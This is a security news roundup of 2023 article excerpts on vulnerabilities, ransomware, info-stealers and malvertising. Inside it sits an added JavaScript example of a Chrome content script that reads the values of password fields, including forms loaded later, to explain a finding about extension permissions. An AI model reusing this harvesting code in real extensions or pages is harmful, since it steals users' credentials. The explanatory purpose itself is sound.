10 new vulnerabilities disclosed by Talos, including use-after-free issue in Google Chrome
Jonathan Munshaw
https://blog.talosintelligence.com/vulnerability-roundup-sept-27-23/
Excerpt:
“Cisco Talos disclosed 10 vulnerabilities over the past two weeks affecting a range of software, including the popular Google Chrome web browser.
Attackers could exploit these vulnerabilities to carry out a variety of attacks, in some cases gaining the ability to execute remote code on the targeted machine.”
Overview of IoT threats in 2023
Vitaly Morgunov, Yaroslav Shmelev, Kaspersky Security Services and Kaspersky ICS CERT
https://securelist.com/iot-threat-report-2023/110644/
Excerpt:
“IoT devices (routers, cameras, NAS boxes, and smart home components) multiply every year. Statista portal predicts their number will exceed 29 billion by 2030. As connected device numbers increase, so does the need for protection against various threats. The first-ever large-scale malware attacks on IoT devices were recorded back in 2008, and their number has only been growing ever since. We conducted an analysis of the IoT threat landscape for 2023, as well as the products and services offered on the dark web related to hacking connected devices. This report contains the key findings of our research.”
Microsoft Uncovers Flaws in ncurses Library Affecting Linux and macOS Systems
THN
https://thehackernews.com/2023/09/microsoft-uncovers-flaws-in-ncurses.html?&web_view=true
Excerpt:
“A set of memory corruption flaws have been discovered in the ncurses (short for new curses) programming library that could be exploited by threat actors to run malicious code on vulnerable Linux and macOS systems.”
Redline and Vidar Stealers Abuse EV Certificates, Deploy Ransomware
https://cyware.com/news/redline-and-vidar-stealers-abuse-ev-certificates-deploy-ransomware-8d46fdbc
Excerpt:
“A recent investigation by Trend Micro indicates that the threat groups operating RedLine and Vidar have started using the same methods to deliver ransomware as they do to distribute the info-stealers.”
Windows 11 ‘ThemeBleed’ RCE bug gets proof-of-concept exploit
Bill Toulas
Excerpt:
“Proof-of-concept exploit code has been published for a Windows Themes vulnerability tracked as CVE-2023-38146 that allows remote attackers to execute code.
The security issue is also referred to as ThemeBleed, and received a high-severity score of 8.8. It can be exploited if the target user opens a malicious .THEME file crafted by the attacker.”
3AM: New Ransomware Family Used As Fallback in Failed LockBit Attack
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit
Excerpt:
“A new ransomware family calling itself 3AM has emerged. To date, the ransomware has only been used in a limited fashion. Symantec’s Threat Hunter Team, part of Broadcom, has seen it used in a single attack by a ransomware affiliate that attempted to deploy LockBit on a target’s network and then switched to 3AM when LockBit was blocked.”
New MidgeDropper Variant
James Slaughter and Shunichi Imano
https://www.fortinet.com/blog/threat-research/new-midgedropper-variant
Excerpt:
“One of the most exciting aspects of malware analysis is coming across a family that is new or rare to the reversing community. Determining the function of the malware, who created it, and the reasons behind it become a mystery to solve. The previously unseen dropper variant we recently found, named MidgeDropper, has a complex infection chain that includes code obfuscation and sideloading, making it an interesting use case. Although we couldn’t obtain the final payload, this blog will still explore what makes this dropper tick.”
BatLoader Unleashed in Ongoing Webex Malvertising Campaign
https://cyware.com/news/batloader-unleashed-in-ongoing-webex-malvertising-campaign-774b17f8
Excerpt:
“A recent malvertising campaign has been found focusing on corporate users who are downloading the widely used web conferencing application, Webex. In this campaign, malicious actors have purchased an advertisement that mimics Cisco's branding, and it appears as the top result when conducting a Google search.”
Malware distributor Storm-0324 facilitates ransomware access
Microsoft Threat Intelligence
Excerpt:
“The threat actor that Microsoft tracks as Storm-0324 is a financially motivated group known to gain initial access using email-based initial infection vectors and then hand off access to compromised networks to other threat actors. These handoffs frequently lead to ransomware deployment. Beginning in July 2023, Storm-0324 was observed distributing payloads using an open-source tool to send phishing lures through Microsoft Teams chats. This activity is not related to the Midnight Blizzard social engineering campaigns over Teams that we observed beginning in May 2023. Because Storm-0324 hands off access to other threat actors, identifying and remediating Storm-0324 activity can prevent more dangerous follow-on attacks like ransomware.”
Chrome extensions can steal plaintext passwords from websites
Bill Toulas
Excerpt:
“A team of researchers from the University of Wisconsin-Madison has uploaded to the Chrome Web Store a proof-of-concept extension that can steal plaintext passwords from a website's source code.
An examination of the text input fields in web browsers revealed that the coarse-grained permission model underpinning Chrome extensions violates the principles of least privilege and complete mediation.”
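The mechanism behind that finding is worth seeing concretely. The following is an added illustration, not the University of Wisconsin-Madison proof-of-concept and not code from the article: a content script that ships with nothing more than a host match pattern gets the same DOM access as the page itself, so it can enumerate every password input and read its value. The `fakeDocument` stand-in and the manifest fragment in the comments are assumptions for running the logic offline under Node; in a real extension `root` would simply be `document`.

```javascript
// Added example: what a Chrome content script can read with only a host
// permission. Not the researchers' PoC; manifest fragment and fakeDocument
// are constructed for illustration.

/** Collect the name and current value of every password input under `root`. */
function harvestPasswordFields(root) {
  const out = [];
  for (const el of root.querySelectorAll('input[type="password"]')) {
    if (el.value) {
      out.push({ name: el.name || el.id || '(unnamed)', value: el.value });
    }
  }
  return out;
}

/**
 * Browser-only: re-run the harvest whenever the page injects new nodes, so
 * login forms rendered late by single-page apps are caught as well.
 */
function watchForPasswordFields(doc, onFound) {
  const observer = new MutationObserver(() => {
    const hits = harvestPasswordFields(doc);
    if (hits.length) onFound(hits);
  });
  observer.observe(doc.documentElement, { childList: true, subtree: true });
  return observer;
}

// Hypothetical manifest (MV3) that is all such a script needs. Note there is no
// permission that distinguishes "read the DOM" from "read password fields":
// {
//   "manifest_version": 3,
//   "content_scripts": [{ "matches": ["<all_urls>"], "js": ["content.js"] }]
// }

/** Constructed stand-in for `document`, so the harvest logic runs under Node. */
function fakeDocument(inputs) {
  return {
    querySelectorAll(selector) {
      if (selector !== 'input[type="password"]') return [];
      return inputs.filter((i) => i.type === 'password');
    },
  };
}

// Run against the real DOM in a browser, or against the stand-in under Node.
if (typeof document !== 'undefined') {
  console.log(harvestPasswordFields(document));
} else {
  const doc = fakeDocument([
    { type: 'text', name: 'user', value: 'alice' },       // constructed
    { type: 'password', name: 'pass', value: 'hunter2' }, // constructed
  ]);
  console.log(harvestPasswordFields(doc)); // [{ name: 'pass', value: 'hunter2' }]
}
```

The point the researchers make is visible in the manifest: the only knob the permission model offers is which sites the script runs on, not what it may touch once there, which is the coarse-grained model that fails least privilege and complete mediation.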
Analyzing a Facebook Profile Stealer Written in Node.js
Jaromir Horejsi
Excerpt:
“During our previous analysis of a campaign involving a Facebook stealer, we discovered another interesting stealer. It was written in Node.js, packaged into an executable, exfiltrated stolen data via both Telegram bot API and a command-and-control (C&C) server, and employed GraphQL as a channel for C&C communication. This blog entry investigates this new stealer and provides an in-depth analysis of its routines and capabilities.”
Vietnamese Cybercriminals Targeting Facebook Business Accounts with Malvertising
THN
https://thehackernews.com/2023/09/vietnamese-cybercriminals-targeting.html?&web_view=true
Excerpt:
“Malicious actors associated with the Vietnamese cybercrime ecosystem are leveraging advertising-as-a-vector on social media platforms such as Meta-owned Facebook to distribute malware.”
Freecycle users told to change passwords after data breach
Graham Cluley
https://grahamcluley.com/freecycle-users-told-to-change-passwords-after-data-breach/?web_view=true
Excerpt:
“Freecycle, an online community that encourages sharing unwanted items with each other rather than chucking them in the bin or taking them to landfill, has told users to change their passwords after it suffered a data breach.”
New Agent Tesla Variant Being Spread by Crafted Excel Document
Xiaopeng Zhang
https://www.fortinet.com/blog/threat-research/agent-tesla-variant-spread-by-crafted-excel-document
Excerpt:
“Our FortiGuard Labs captured a phishing campaign that spreads a new Agent Tesla variant. This well-known malware family uses a .NET-based Remote Access Trojan (RAT) and data stealer to gain initial access. It is often used for Malware-as-a-Service (MaaS).”